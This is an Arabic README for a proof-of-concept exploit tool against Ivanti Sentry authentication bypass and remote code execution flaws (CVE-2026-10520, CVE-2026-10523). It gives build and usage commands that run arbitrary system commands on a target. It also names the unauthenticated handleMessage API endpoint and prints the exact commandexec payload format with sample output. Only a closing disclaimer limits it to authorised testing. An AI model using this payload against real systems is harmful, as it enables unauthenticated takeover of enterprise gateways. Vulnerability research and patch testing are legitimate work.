
أداة كشف إثبات المفهوم لثغرات تجاوز المصادقة وتنفيذ التعليمات البرمجية عن بُعد في Ivanti Sentry (CVE-2026-10520، CVE-2026-10523). ترسل طلبات API مصممة لتنفيذ أوامر النظام والتحقق من النشرات الضعيفة.
أداة شاملة لإثبات المفهوم للكشف عن ثغرات Ivanti Sentry المتعلقة بتجاوز المصادقة وتنفيذ الأكواد عن بُعد. تحدد هذه الأداة الأنظمة المعرضة لـ CVE-2026-10520 و CVE-2026-10523.
صُمم هذا المشروع لكشف والتحقق مما إذا كانت نسخة Ivanti Sentry معرضة لثغرات حرجة في تجاوز المصادقة وتنفيذ الأكواد عن بُعد. ترسل الأداة رسائل مصممة خصيصًا عبر واجهة API الخاصة بـ Ivanti Sentry لتنفيذ أوامر النظام واستخراج النتائج، مما يسمح للباحثين الأمنيين ومختبري الاختراق بتحديد النشرات المعرضة للخطر.
ثغرة تجاوز المصادقة في Ivanti Sentry تسمح بالوصول غير المصادق إلى نقاط نهاية API المقيدة.
ثغرة تنفيذ أكواد عن بُعد في Ivanti Sentry تسمح بتنفيذ أوامر نظام عشوائية من خلال واجهة API للرسائل عند دمجها مع تجاوز المصادقة.
استنساخ المستودع والانتقال إلى دليل المشروع:
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry
الحصول على التهيئة ومكتبة الحزمة
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy
بناء الملف التنفيذي:
go build -o tot_poc tot_poc.go

تتطلب الأداة معلمتين إجباريتين: عنوان URL الهدف والأمر المراد تنفيذه.

تشغيل أمر بسيط على الهدف:
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
-url (إجباري): عنوان URL الأساسي للهدف مع البروتوكول (مثال: https://127.0.0.1:8443)-cmd (إجباري): الأمر الذي سيتم تنفيذه للكشف عن الثغرة (مثال: "uname -a"، "id"، "whoami")-p أو -proxy (اختياري): عنوان الوكيل والمنفذ لتوجيه الحركة (مثال: 127.0.0.1:8080)
كشف الثغرة بأمر معلومات نظام بسيط:
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
تشغيل مع إعدادات الوكيل:
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
تنفيذ أمر لاستخراج معلومات النظام:
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
ستعرض الأداة:
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.
Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
Target: https://192.168.1.100:8443
Command: uname -a
[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.
تستغل الأداة نقطة النهاية /mics/api/v2/sentry/mics-config/handleMessage التي يمكن الوصول إليها دون مصادقة. يتم إنشاء الحمولة على النحو التالي:
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
تحتوي الاستجابة على مخرجات الأمر بتنسيق XML داخل علامة النجاح.
هذه الأداة مقدمة لأغراض الاختبار الأمني المصرح به والبحث فقط. يتحمل المستخدمون وحدهم مسؤولية ضمان حصولهم على إذن مناسب قبل اختبار أي أنظمة. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. لا يتحمل المؤلفون أي مسؤولية عن إساءة الاستخدام أو الضرر الناتج عن هذه الأداة.
GhostGTR666 - Gagaltotal666
هذا المشروع مقدم كما هو لأغراض البحث الأمني والتعليم.